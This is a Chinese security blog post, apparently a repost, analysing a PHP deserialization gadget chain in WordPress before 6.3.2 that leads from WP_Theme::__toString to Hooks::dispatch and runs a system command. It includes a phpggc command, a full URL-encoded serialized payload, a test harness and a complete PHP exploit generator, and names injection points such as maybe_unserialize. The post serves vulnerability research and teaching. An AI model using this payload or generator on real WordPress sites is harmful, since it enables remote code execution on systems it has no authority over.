一条有趣的WordPress反序列化链分析

admin 2024年2月11日10:01:09评论8 views字数 12872阅读42分54秒阅读模式

WordPress反序列化链分析

前言

最近实践中正好碰到一个WordPress站点,发现很久没有关注PHP框架中的漏洞,于是去PHPGGC上看一看有没有"好玩的"RCE,正好看到WordPress/RCE/1这条链,仔细分析一下其过程,挺有意思

描述

WordPress < 6.3.2,存在一条反序列链,以WP_Theme中的__toString为起点,WpOrgRequestsHooks的dispatch方法为终点。

相关类

WP_Block_List类

在WordPress中,WP_Block_List 类是用于管理和操作页面上的块(blocks)的核心类之一。块是WordPress编辑器(Gutenberg)的基本构建单元,用于创建和组织内容。

WP_Block_List 类提供了一系列方法来处理块,包括以下功能:

  1. 注册和管理块类型:WP_Block_List 类允许开发者注册和管理自定义的块类型。通过注册块类型,可以定义块的属性、编辑器样式和渲染模板等。

  2. 渲染块内容:WP_Block_List 类提供了方法来渲染块的内容。这包括将块的属性传递给块模板,生成最终的块输出。

  3. 解析块内容:WP_Block_List 类还提供了将块内容解析为可编辑的块数据结构的方法。这对于处理保存在数据库中的块内容以及在编辑器中加载和编辑块非常有用。

  4. 块过滤和转换:WP_Block_List 类提供了方法来过滤和转换块内容。这样可以对块进行操作,例如添加、删除、修改属性或在块之间进行排序。

WP_Theme

在WordPress中,WP_Theme类是一个用于处理和管理主题(theme)的类。它提供了一组方法和属性,用于获取主题的信息、样式和模板文件、父子主题关系等。

WP_Block_Type_Registry

WP_Block_Type_Registry类是一个用于管理和注册区块类型(Block Type)的类。它提供了一系列方法和功能,用于注册、检索和操作区块类型。开发者可以轻松地注册、获取和管理区块类型。区块类型是Gutenberg编辑器中的核心概念,它定义了一个可重复使用的区块,具有自己的属性、样式和呈现逻辑。WP_Block_Type_Registry类提供了一种机制,允许开发者通过自定义区块类型来扩展和定制WordPress的编辑体验。

WpOrgRequestsSession

WpOrgRequestsSession是一个用于处理会话数据的类。它提供了一组方法和功能,用于在WordPress应用程序中管理和存储会话数据。

WpOrgRequestsHooks

Wp_Hook类的方法允许开发者通过添加、移除和执行回调函数来自定义和扩展WordPress功能。通过使用动作钩子和过滤器钩子,开发者可以在适当的时机干预WordPress的执行流程,并修改数据、添加功能或者改变输出。

Trick

<?php
class hello{
public function aaa(){
echo "hello!";
}
}
$hello = new hello();
[$hello,"aaa"]();
?>

这样能够成功执行hello中的aaa方法,这在CTF中经常出现

可变函数:可变函数(Variable Functions)是一种特殊的语法,允许通过变量来调用函数。这意味着函数名可以存储在一个变量中,并在需要时通过该变量动态调用函数。

测试

payload生成

使用phpggc生成:

php phpggc WordPress/RCE1 system whoami -u

一条有趣的WordPress反序列化链分析

测试文件

<?php
require_once __DIR__.'/wp-load.php';
wp();
$str = "O%3A8%3A%22WP_Theme%22%3A2%3A%7Bs%3A7%3A%22headers%22%3BO%3A13%3A%22WP_Block_List%22%3A2%3A%7Bs%3A6%3A%22blocks%22%3Ba%3A1%3A%7Bs%3A4%3A%22Name%22%3Ba%3A1%3A%7Bs%3A9%3A%22blockName%22%3Bs%3A12%3A%22Parent+Theme%22%3B%7D%7Ds%3A8%3A%22registry%22%3BO%3A22%3A%22WP_Block_Type_Registry%22%3A1%3A%7Bs%3A22%3A%22registered_block_types%22%3BO%3A8%3A%22WP_Theme%22%3A2%3A%7Bs%3A7%3A%22headers%22%3BN%3Bs%3A6%3A%22parent%22%3BO%3A22%3A%22WpOrg%5CRequests%5CSession%22%3A3%3A%7Bs%3A3%3A%22url%22%3Bs%3A10%3A%22http%3A%2F%2Fp%3A0%22%3Bs%3A7%3A%22headers%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A5%3A%22hooks%22%3BO%3A20%3A%22WpOrg%5CRequests%5CHooks%22%3A1%3A%7Bs%3A5%3A%22hooks%22%3Ba%3A1%3A%7Bs%3A23%3A%22requests.before_request%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A20%3A%22WpOrg%5CRequests%5CHooks%22%3A1%3A%7Bs%3A5%3A%22hooks%22%3Ba%3A1%3A%7Bs%3A15%3A%22http%3A%2F%2Fp%3A0%2FName%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7Di%3A1%3Bs%3A8%3A%22dispatch%22%3B%7D%7D%7D%7D%7D%7D%7D%7D%7D%7Ds%3A6%3A%22parent%22%3BN%3B%7D";
$obj = unserialize(urldecode($str));
echo $obj;
?>

输出结果

一条有趣的WordPress反序列化链分析

函数调用栈

Hooks.php:93, WpOrgRequestsHooks->dispatch()
Hooks.php:93, WpOrgRequestsHooks->dispatch()
Requests.php:455, WpOrgRequestsRequests::request()
Session.php:232, WpOrgRequestsSession->request()
Session.php:159, WpOrgRequestsSession->get()
class-wp-theme.php:702, WP_Theme->offsetGet()
class-wp-block-type-registry.php:145, WP_Block_Type_Registry->get_registered()
class-wp-block.php:130, WP_Block->__construct()
class-wp-block-list.php:96, WP_Block_List->offsetGet()
class-wp-theme.php:833, WP_Theme->get()
class-wp-theme.php:851, WP_Theme->display()
class-wp-theme.php:513, WP_Theme->__toString()
debug.php:6, {main}()

调试分析

第一步

从测试文件开始

一条有趣的WordPress反序列化链分析

通过反序列化得到的$obj是WP_Theme对象,而使用echo输出对象会触发该对象的__toString方法

第二步

进入wp-includes/class-wp-theme.php的__toString方法

/**
* When converting the object to a string, the theme name is returned.
*
* @since 3.4.0
*
* @return string Theme name, ready for display (translated)
*/
public function __toString() {
return (string) $this->display( 'Name' );
}

传入字符串Name,进入该对象的display方法

public function display( $header, $markup = true, $translate = true ) {
// 这里
$value = $this->get( $header );
if ( false === $value ) {
return false;
}

if ( $translate && ( empty( $value ) || ! $this->load_textdomain() ) ) {
$translate = false;
}

if ( $translate ) {
$value = $this->translate_header( $header, $value );
}

if ( $markup ) {
$value = $this->markup_header( $header, $value, $translate );
}

return $value;
}

这里的$header为字符串Name,依旧还在该类中,进入get方法

public function get( $header ) {
if ( ! isset( $this->headers[ $header ] ) ) {
return false;
}

if ( ! isset( $this->headers_sanitized ) ) {
$this->headers_sanitized = $this->cache_get( 'headers' );
if ( ! is_array( $this->headers_sanitized ) ) {
$this->headers_sanitized = array();
}
}

if ( isset( $this->headers_sanitized[ $header ] ) ) {
return $this->headers_sanitized[ $header ];
}

// If themes are a persistent group, sanitize everything and cache it. One cache add is better than many cache sets.
if ( self::$persistently_cache ) {
foreach ( array_keys( $this->headers ) as $_header ) {
$this->headers_sanitized[ $_header ] = $this->sanitize_header( $_header, $this->headers[ $_header ] );
}
$this->cache_add( 'headers', $this->headers_sanitized );
} else {

// 关键点
$this->headers_sanitized[ $header ] = $this->sanitize_header( $header, $this->headers[ $header ] );
}

return $this->headers_sanitized[ $header ];
}

这里的$this->headers[ $header ]类似于访问数组元素,而headers属性可以控制,将其设置成实现ArrayAccess接口的类,这样就会调用该类的 offsetGet、offsetSet、offsetExists 和 offsetUnset 等方法进行元素的操作

这里将$this->headers设置成WP_Block_List对象,这个类实现了ArrayAccess接口,这样在$this->headers[ $header ]操作时会进入offsetGet方法,其中$header依旧为字符串Name

一条有趣的WordPress反序列化链分析

第三步

进入wp-includes/class-wp-block-list.php的offsetGet方法

public function offsetGet( $index ) {
$block = $this->blocks[ $index ];

if ( isset( $block ) && is_array( $block ) ) {
// 关键点
$block = new WP_Block( $block, $this->available_context, $this->registry );
$this->blocks[ $index ] = $block;
}

return $block;
}

同样WP_Block_List对象中的属性全部都能控制,要达到关键点,需要满足if条件,即blocks属性要有Name键,并且是一个数组

一条有趣的WordPress反序列化链分析

这里会实例化一个WP_Block对象,并且参数都是可控

第四步

进入wp-includes/class-wp-block.php的构造方法

public function __construct( $block, $available_context = array(), $registry = null ) {
$this->parsed_block = $block;
$this->name = $block['blockName'];

if ( is_null( $registry ) ) {
$registry = WP_Block_Type_Registry::get_instance();
}

$this->registry = $registry;

// 关键点
$this->block_type = $registry->get_registered( $this->name );

$this->available_context = $available_context;

// ...
}

这里构造方法的$registry参数可控,并且关键点中的$this->name也可控,因此这里选择将$registry设置成WP_Block_Type_Registry 扩展类的实例,通过调用其get_registered方法来衔接链

一条有趣的WordPress反序列化链分析

第五步

进入wp-includes/class-wp-block-type-registry.php的get_registered方法

public function get_registered( $name ) {
if ( ! $this->is_registered( $name ) ) {
return null;
}
// 关键点
return $this->registered_block_types[ $name ];
}

要到达关键点,首先需要不满足if条件:! $this->is_registered( $name ),即对应的$name已注册

public function is_registered( $name ) {
return isset( $this->registered_block_types[ $name ] );
}

在关键点处,同样的道理,$this->registered_block_types为实现ArrayAccess接口的类实例,这样在取$name时能够调用offsetGet方法

一条有趣的WordPress反序列化链分析

这里将$this->registered_block_types设置为WP_Theme实例,WP_Theme类同样也继承ArrayAccess接口

第六步

进入wp-includes/class-wp-theme.php的offsetGet方法

public function offsetGet( $offset ) {
switch ( $offset ) {
case 'Name':
case 'Title':
/*
* See note above about using translated data. get() is not ideal.
* It is only for backward compatibility. Use display().
*/
return $this->get( 'Name' );
case 'Author':
return $this->display( 'Author' );
case 'Author Name':
return $this->display( 'Author', false );
case 'Author URI':
return $this->display( 'AuthorURI' );
case 'Description':
return $this->display( 'Description' );
case 'Version':
case 'Status':
return $this->get( $offset );
case 'Template':
return $this->get_template();
case 'Stylesheet':
return $this->get_stylesheet();
case 'Template Files':
return $this->get_files( 'php', 1, true );
case 'Stylesheet Files':
return $this->get_files( 'css', 0, false );
case 'Template Dir':
return $this->get_template_directory();
case 'Stylesheet Dir':
return $this->get_stylesheet_directory();
case 'Screenshot':
return $this->get_screenshot( 'relative' );
case 'Tags':
return $this->get( 'Tags' );
case 'Theme Root':
return $this->get_theme_root();
case 'Theme Root URI':
return $this->get_theme_root_uri();
// 关键点
case 'Parent Theme':
return $this->parent() ? $this->parent()->get( 'Name' ) : '';
default:
return null;
}
}

$offset参数可控,这里将其设置为'Parent Theme',查看$this->parent()

public function parent() {
return isset( $this->parent ) ? $this->parent : false;
}

返回parent属性,$this->parent同样可控,可以将其设置为一个包含get方法的类实例,这里选择Session实例

一条有趣的WordPress反序列化链分析

第七步

进入wp-includes/Requests/src/Session.php的get方法

public function get($url, $headers = [], $options = []) {
return $this->request($url, $headers, null, Requests::GET, $options);
}

这里的$url依旧是字符串Name,进入本类的request方法

public function request($url, $headers = [], $data = [], $type = Requests::GET, $options = []) {
// 合并成一个request请求
$request = $this->merge_request(compact('url', 'headers', 'data', 'options'));
// 使用静态方法发起一个请求
// 关键点
return Requests::request($request['url'], $request['headers'], $request['data'], $type, $request['options']);
}

进入request方法的参数都可控

一条有趣的WordPress反序列化链分析

第八步

进入wp-includes/Requests/src/Requests.php的request方法

public static function request($url, $headers = [], $data = [], $type = self::GET, $options = []) {
if (InputValidator::is_string_or_stringable($url) === false) {
throw InvalidArgument::create(1, '$url', 'string|Stringable', gettype($url));
}

if (is_string($type) === false) {
throw InvalidArgument::create(4, '$type', 'string', gettype($type));
}

if (is_array($options) === false) {
throw InvalidArgument::create(5, '$options', 'array', gettype($options));
}

if (empty($options['type'])) {
$options['type'] = $type;
}

$options = array_merge(self::get_default_options(), $options);

self::set_defaults($url, $headers, $data, $type, $options);

// 使用请求钩子(hooks)触发requests.before_parse事件,允许用户在解析响应之前对响应进行自定义操作
// 关键点
$options['hooks']->dispatch('requests.before_request', [&$url, &$headers, &$data, &$type, &$options]);

// ...
}

$options变量可控,需要寻找一个包含dispatch方法的类,选择Hooks实例

一条有趣的WordPress反序列化链分析

第九步

进入wp-includes/Requests/src/Hooks.php的dispatch方法

public function dispatch($hook, $parameters = []) {
if (is_string($hook) === false) {
throw InvalidArgument::create(1, '$hook', 'string', gettype($hook));
}

// Check strictly against array, as Array* objects don't work in combination with `call_user_func_array()`.
if (is_array($parameters) === false) {
throw InvalidArgument::create(2, '$parameters', 'array', gettype($parameters));
}

if (empty($this->hooks[$hook])) {
return false;
}

if (!empty($parameters)) {
// Strip potential keys from the array to prevent them being interpreted as parameter names in PHP 8.0.
$parameters = array_values($parameters);
}

ksort($this->hooks[$hook]);

// 关键部分
// 通过两层循环,遍历钩子列表中的每个回调函数。外层循环按照优先级顺序遍历,内层循环遍历每个优先级下的回调函数。
// 在内层循环中,通过调用 $callback(...$parameters) 执行回调函数。使用可变长度参数语法将 $parameters 数组中的元素作为参数传递给回调函数。
foreach ($this->hooks[$hook] as $priority => $hooked) {
foreach ($hooked as $callback) {
$callback(...$parameters);
}
}

return true;
}

该方法的作用是触发指定钩子事件,并按照优先级顺序执行与之关联的回调函数。它通过遍历钩子列表中的回调函数,并将参数传递给每个回调函数来实现这一目的。这种机制允许开发者在特定的时机插入自定义逻辑,扩展和定制程序的功能。

这里的hooks和$parameters都可控,从而控制$callback回调函数和参数

第一次调用dispatch方法,即Requests.php中的request方法处

$options['hooks']->dispatch('requests.before_request', [&$url, &$headers, &$data, &$type, &$options]);

所构成的回调函数$this->hooks["requests.before_request"][0][0]([&$url, &$headers, &$data, &$type, &$options])

而$this->hooks["requests.before_request"][0][0]为一个数组,第一个元素为Hooks实例,第二个元素为方法字符串"dispatch",因此又回调至Hooks的dispatch方法

一条有趣的WordPress反序列化链分析

第二次调用dispatch方法,通过回调,由于dispatch方法只使用了两个参数,因此回调中的后三个参数不会使用,即$data、$type和$option

dispatch(&$url, &$headers)

此时的$this对应的是新Hooks实例,$hook参数对应的是$url,而$this->hooks数组中存在以$url为键的值,是一个数组,里面第一个元素为system字符串

而$parameters对应的是$header,是一个数组,里面存放whoami字符串,从而构成回调方法:system(["whoami"])

一条有趣的WordPress反序列化链分析

最后成功RCE

尝试编写EXP

根据实现的整体流程,尝试动手编写EXP

<?php
namespace WpOrgRequests {
class Session {
private $url;
private $headers;
private $options;

public function __construct($url, $headers, $options)
{
$this->url = $url;
$this->headers = $headers;
$this->options = $options;
}
}

class Hooks
{
public $hooks;

public function __construct($hooks)
{
$this->hooks = $hooks;
}
}
}

namespace {

use WpOrgRequestsHooks;
use WpOrgRequestsSession;

class WP_Theme {
private $headers;
private $parent;

public function __construct($headers, $parent)
{
$this->headers = $headers;
$this->parent = $parent;
}
}

class WP_Block_List {
private $blocks;
private $registry;

public function __construct($blocks, $registry)
{
$this->blocks = $blocks;
$this->registry = $registry;
}
}

class WP_Block_Type_Registry {
private $registered_block_types;

public function __construct($registered_block_types)
{
$this->registered_block_types = $registered_block_types;
}
}

$hooks = array(
"requests.before_request" => array(
// $hooked
array(
// $callback
array (
new Hooks(array(
"http://p:0/Name" => array(
array("system")
)
)
),
"dispatch"
)
)
)
);

// 需要设置hooks属性
$hook = new Hooks($hooks);

// headers对应的最后执行的命令数组
// options中有一个hooks键,需要设置成Hooks实例
$parent = new Session("http://p:0", array("whoami"), array("hooks" => $hook) );

// 需要设置parent属性为Session实例
$registered_block_types = new WP_Theme(null, $parent);

// 在WP_Theme中根据offsetGet方法来设置
$block = ["blockName" => "Parent Theme"];
$blocks = ["Name" => $block];
// 需要设置registered_block_types属性,同样为继承ArrayAccess接口的实例,即WP_Theme
$registry = new WP_Block_Type_Registry($registered_block_types);
// 需要设置blocks属性,含有“Name”键,为数组
// 需要设置registry属性为WP_Block_Type_Registry对象
$headers = new WP_Block_List($blocks, $registry);

// WP_Theme中的get方法,需要设置$header属性为继承ArrayAccess接口的实例,即WP_Block_List
// 触发__toString方法的对象
$theme = new WP_Theme($headers, null);

echo urlencode(serialize($theme));
}

生成的payload能够成功RCE

触发

首先需要找到反序列化点,在wordpress中存在该方法maybe_unserialize会对传入的数据进行反序列化

function maybe_unserialize( $data ) {
if ( is_serialized( $data ) ) { // Don't attempt to unserialize data that wasn't serialized going in.
return @unserialize( trim( $data ) );
}

return $data;
}

而调用该方法的在整个项目中存在20项

一条有趣的WordPress反序列化链分析

payload注入点:

一般而言通过SQL注入漏洞往数据库中写入恶意的payload能够到达这一效果,在wpscan的报告中提到,存在SQL注入漏洞会在 wp_termmeta 表中插入新行,插入的元数据在检索时会经过 maybe_unserialize,从而造成RCE

其实管理员用户名处、站点名等设置成恶意payload都可以导致RCE

来源:https://xz.aliyun.com/ 感谢【Dili

原文始发于微信公众号(船山信安):一条有趣的WordPress反序列化链分析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月11日10:01:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一条有趣的WordPress反序列化链分析https://cn-sec.com/archives/2487808.html

发表评论

匿名网友 填写信息